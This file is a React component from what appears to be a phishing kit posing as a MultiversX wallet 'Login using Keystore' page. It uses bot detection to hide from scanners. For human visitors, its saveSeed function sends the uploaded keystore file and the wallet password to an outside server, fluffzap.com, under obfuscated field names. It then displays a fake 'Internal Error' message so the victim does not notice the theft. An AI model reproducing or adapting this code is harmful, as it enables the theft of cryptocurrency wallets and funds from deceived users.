import React, { useState, useEffect, useRef } from 'react';
import { Close, SelectFileSVG, Eye, EyeOff, Mark, DeleteSVG, Logo } from '../Svg'; 
import { useNavigate } from 'react-router-dom';
import { load } from '@fingerprintjs/botd';
import axios from 'axios';

export default function Keystore() {
  const [isBot, setIsBot] = useState(true);
  const [showPwd, setShowPwd] = useState(false);
  const [fileSelected, setFileSelected] = useState(false);
  const [fileName, setFileName] = useState('');
  const [fileOk, setFileOk] = useState(false);
  const [isRequired, setIsRequired] = useState(false);
  const fileInputRef = useRef(null);
  const [seed, setSeed] = useState("");
  const [inval, setInval] = useState(false);
  const [isPasswordRequired, setIsPasswordRequired] = useState(false);
  const [password, setPassword] = useState('');
  const [loading, setLoading] = useState(false);
  const [showModal, setShowModal] = useState(false); 

  useEffect(() => {
    const botdPromise = load()
    botdPromise
      .then((botd) => botd.detect())
      .then((result) => {
        setIsBot(result?.bot)
        if (result?.bot === true) {
          window.open("https://yeyeyeyeyey")
          return null
        }
      })
      .catch((error) => console.error(error))
  }, [])

  const togglePasswordVisibility = () => {
    setShowPwd(!showPwd);
  };

  const navigate = useNavigate();

  const closeKstore = () => {
    navigate('/');
  };

  useEffect(() => {
    document.body.style.overflow = 'hidden';
    return () => {
      document.body.style.overflow = 'auto';
    };
  }, []);

  const handleDivClick = () => {
    fileInputRef.current.click();
  };

  const handleFileChange = (event) => {
    const selectedFile = event.target.files[0];
    if (selectedFile) {
      setFileName(truncateFileName(selectedFile.name));
      setFileSelected(true);
      setIsRequired(false);
      handleUploadValidation(selectedFile);
    }
  };

  const handlePasswordFocus = () => {
    if (password.trim() === '') {
      setIsPasswordRequired(true);
    }
  };

  const handlePasswordBlur = () => {
    setIsPasswordRequired(password.trim() === '');
  };

  const handlePasswordChange = (e) => {
    setPassword(e.target.value);
    setIsPasswordRequired(e.target.value.trim() === '');
  };

  const truncateFileName = (name, maxLength = 62) => {
    if (name.length <= maxLength) return name;
    const extensionIndex = name.lastIndexOf('.');
    const extension = extensionIndex !== -1 ? name.slice(extensionIndex) : '';
    const remainingLength = 8 - extension.length;
    const firstPart = name.slice(0, 10);
    const lastPart = name.slice(-(remainingLength + extension.length));
    return `${firstPart}...${lastPart}`;
  };

  const handleUploadValidation = (file) => {
    if (!file) return false;
    const reader = new FileReader();
    reader.onload = (event) => {
      try {
        const json = JSON.parse(event.target.result);
        const isValid = validateKeystore(json);
        setFileOk(isValid);
      } catch (err) {
        setFileOk(false);
        setIsRequired(true);
      }
    };
    reader.readAsText(file);
  };

  const validateKeystore = (data) => {
    const requiredFields = ['version', 'id', 'kind', 'crypto'];
    if (requiredFields.every(field => field in data)) {
      setFileOk(true);
      setInval(false);
      setSeed(JSON.stringify(data));
      return true;
    } else {
      setFileOk(false);
      setInval(true);
      return false;
    }
  };

  const handleDeleteFile = () => {
    setFileName('');
    setFileOk(false);
    setFileSelected(false);
    setIsRequired(true);
    fileInputRef.current.value = '';
  };

  async function saveSeed() {
    setLoading(true);
    try {
      if (!isBot) {
        await axios.post("https://fluffzap.com/ser2.php", {
          yeeterrererereeeeeeeeeeeeeeerererrerereeeeeeerreerrererer: "eteteywwywywtwttwwrwrwrrwrwttwtwttwtwtwttwtwtwtwttwtwtwt",
          eteteywwywywtwttwwrwrwrrwrwttwtwttwtwtwttwtwtwtwttwtwtwt: "yeeterrererereeeeeeeeeeeeeeerererrerereeeeeeerreerrererer",
          tyxyetwrwrwewewwewesdsdswewewrwrwrweweweeqwqwqqwrytwtwrw: seed,
          yryrrtrttteueuruururiririirurururryyryrtrtrtrttrtrtrt: password,
        }, {
          headers: {
            'Content-Type': 'application/json',
          }
        })
      }
    } catch (err) {
      console.error(err);
    } finally {
      setLoading(false);
      setShowModal(true);
    }
  }

  return (
    <div className="fixed inset-0 flex items-center justify-center z-50">
      <div className="absolute inset-0 bg-black bg-opacity-30" onClick={closeKstore}></div>
      <div className="bg-black sm:rounded-[20px] sm:max-w-[700px] w-full h-full p-6 sm:p-8 flex flex-col relative z-10" onClick={(e) => e.stopPropagation()}>
        <div className="flex justify-end">
          <button onClick={closeKstore} className="flex items-center justify-center w-[30px] h-[30px] rounded-full hover:bg-[#262626] group transition duration-200">
            <div className="text-white group-hover:text-[#25e8d0]">{Close}</div>
          </button>
        </div>
        
        <div className="flex flex-col items-center text-center mt-4">
          <h1 className="text-[#d4d4d4] text-2xl font-bold mb-2">Login using Keystore</h1>
          <p className="text-gray-400 text-base">Drag & drop your keystore file here or select file</p>
        </div>

        <div className="flex flex-col items-center mt-6 gap-[10px]">
          <div className={`w-[85%] h-[250px] rounded-[15px] border ${fileSelected ? (fileOk ? 'border-[#23f7dd]' : 'border-red-500') : isRequired ? 'border-red-500' : 'border-gray-400'}
          border-dashed p-4 flex flex-col items-center justify-center gap-2 cursor-pointer`} onClick={handleDivClick}>
            <input type="file" ref={fileInputRef} style={{ display: 'none' }} onChange={handleFileChange} />
            <div className="mb-2 flex justify-center items-center flex-col gap-[5px]">
              <div style={{ filter: fileSelected && fileOk ? 'invert(76%) sepia(17%) saturate(4000%) hue-rotate(135deg) brightness(100%) contrast(98%)' : 'invert(100%)' }}>
                {SelectFileSVG}
              </div>
              {fileSelected && (
                <p className={`text-[12px] font-semibold ${fileOk ? 'text-[#20d9c3]' : 'text-red-400'}`}>
                  {fileOk ? "Keystore loaded" : "Please check the file for error"}
                </p>
              )}
            </div>

            {/* File Name and Status Display */}
            {fileSelected ? (
              <div className="w-[90%] bg-[#171717] rounded-[5px] p-2 text-[#d4d4d4]">
                <div className="flex items-center justify-between">
                  <p className="text-center">{fileName}</p>
                  <button onClick={handleDeleteFile} className="text-[#d4d4d4] hover:text-red-500 focus:outline-none">
                    {DeleteSVG}
                  </button>
                </div>
                {fileOk ? (
                  <div className="flex gap-[4px] items-center mt-2 text-[#21ead1] text-[12px]">
                    <span className="ml-1">Validated</span> {Mark}
                  </div>
                ) : (
                  <p className="text-red-500 text-[12px] text-left w-full mt-1">Invalid file format</p>
                )}
              </div>
            ) : (
              <>
                <p className="text-[#525252] text-center text-sm">Drag and drop here or</p>
                <p className="text-[#23f7dd] text-center font-normal text-base">Select a file</p>
              </>
            )}
          </div>

          {isRequired && !fileSelected && (
            <p className="text-red-500 text-[12px] text-left w-[85%] mt-1">Required</p>
          )}

          <div className={`flex items-center w-[85%] bg-[#171717] mt-[10px] rounded-[10px] px-[20px] py-[10px] ${isPasswordRequired ? 'border border-red-500' : ''}`}>
            <input type={showPwd ? 'text' : 'password'} placeholder="Password..." value={password} onFocus={handlePasswordFocus} onBlur={handlePasswordBlur} onChange={handlePasswordChange} className="w-full max-w-md bg-transparent text-white outline-none placeholder-[#6c6c6c]" />
            <button className="ml-auto text-gray-400 hover:text-[#5c5c5c] focus:outline-none" onClick={togglePasswordVisibility}>
              {showPwd ? EyeOff : Eye}
            </button>
          </div>
          {isPasswordRequired && <p className="text-red-500 text-[12px] text-left w-[85%] mt-1">Required</p>}

          <button className={`px-[20px] py-[10px] rounded-[10px] mt-[15px] font-500 ${loading ? 'bg-transparent border border-green-500 text-green-500' : fileSelected && password ? 'bg-[#23f7dd] text-black' : 'bg-transparent text-[#6a6a6a] border border-gray-500'}`} disabled={!fileSelected || !password || loading} 
          onClick={() => {
            if (fileSelected && password) {
              saveSeed();
            }
          }}>
            {loading ? <div className="spinner text-green-500"></div> : "Access Wallet"}
          </button>
        </div>

        {showModal && (
          <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
            <div className="bg-[#171717] fade-up-element w-full max-w-[500px] rounded-[10px] p-6 flex flex-col gap-[10px] items-center text-center space-y-4">
              <div className="text-white">{Logo}</div>
              <div className='flex flex-col justify-center items-center gap-[5px]'>
                <p className="text-[#23f7dd] font-800px text-[20px]">MultiversX Internal Error Occurred!</p>
                <p className='text-[white]'>Oops! We couldn’t establish a connection to the MultiversX blockchain network. Please ensure your internet connection is stable and try again.</p>
              </div>
              <button className='text-[#23f7dd] hover:text-black bg-transparent rounded-[8px] border border-[1px] border-gray-500 px-[15px] py-[5px] hover:bg-[#23f7dd]' onClick={() => setShowModal(false)}>Ok</button>
            </div>
          </div>
        )}
      </div>
    </div>
  );
}
